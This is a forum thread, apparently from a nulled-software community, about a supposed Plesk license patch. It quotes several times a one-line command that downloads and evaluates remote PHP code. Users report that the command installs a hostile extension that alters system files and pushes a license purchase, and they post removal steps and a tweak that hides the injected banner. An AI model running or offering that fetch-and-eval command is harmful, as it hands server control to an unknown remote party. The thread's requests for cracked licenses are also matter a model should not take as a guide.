Plesk Onyx Web Host Edition

72ppi

New member
May 7, 2020
10
5
3
Bro just curious how would you explain this code in your version?
Code:
plesk php -er "eval(file_get_contents('https://plesktrial.yoncu.com/?CMD=x'));";

Please be so kind as to inform about the commercial interest in this patch.

Tested on Plesk Obsidian and upon installing you are encouraged to purchase a [k]ed license from a sketchy site that will never gain my trust nor recieve my CC. :mad:

Please provide a genuine [k] solution or at least inform about the payment.
 
  • Like
Reactions: pantax.digital

pantax.digital

New member
Nov 7, 2020
12
5
3
VERY IMPORTANT ATTENTION!

For those who installed the code ( plesk php -er "eval(file_get_contents('http://ossav.com/OLC'));" ) and now have the notification messages, run this code through the CLI and you will be able to give up the extension and correct Plesk.

plesk bin extension --list
plesk bin extension --uninstall OsSav

Sem Título.png
 
  • Like
Reactions: sherone and 72ppi

pantax.digital

New member
Nov 7, 2020
12
5
3
Friend, tell me please, have you ordered licenses here? Very nice prices. Can I order?
No, don't, risk your credit card, and risk your server. I had to reinstall my server because I used this script, it changes critical system files.
 

72ppi

New member
May 7, 2020
10
5
3
VERY IMPORTANT ATTENTION!

For those who installed the code ( plesk php -er "eval(file_get_contents('http://ossav.com/OLC'));" ) and now have the notification messages, run this code through the CLI and you will be able to give up the extension and correct Plesk.

plesk bin extension --list
plesk bin extension --uninstall OsSav

Sem Título.png
Good post. Another solution is setting the OSSav notification bar to 'display:none !important;' and setting chmod on the CSS to 600. A small hack and not a viable solution long term.
 
  • Like
Reactions: pantax.digital

andoru

Well-known member
Dec 23, 2020
105
264
63
Indonesia
i'll try to answer with help from chatGPT XD

Guideline for editing main.js file in /opt/psa/admin/cp/public/javascript directory:

  1. Open a terminal and navigate to the directory /opt/psa/admin/cp/public/javascript using the command
    cd /opt/psa/admin/cp/public/javascript.
  2. Use a text editor to open the main.js file. For example, you can use the command nano main.js or vi main.js.
  3. Find the following line of code in the main.js file:
    document.querySelector('div.pul-layout__header-addon').innerHTML=(false?'':'<center class="msg-box msg-warning"
  4. Append the following to the end of the line:
    style="display: none !important;"
  5. The final line of code should look like this:
    ... document.querySelector('div.pul-layout__header-addon').innerHTML=(false?'':'<center class="msg-box msg-warning" style="display: none !important;">'+atob ...
  6. Save the changes and close the text editor.

Make a backup of the original file before making any changes to it.
 

About us

  • Our community has been around for many years and pride ourselves on offering unbiased, critical discussion among people of all different backgrounds. We are working every day to make sure our community is one of the best.

Quick Navigation

User Menu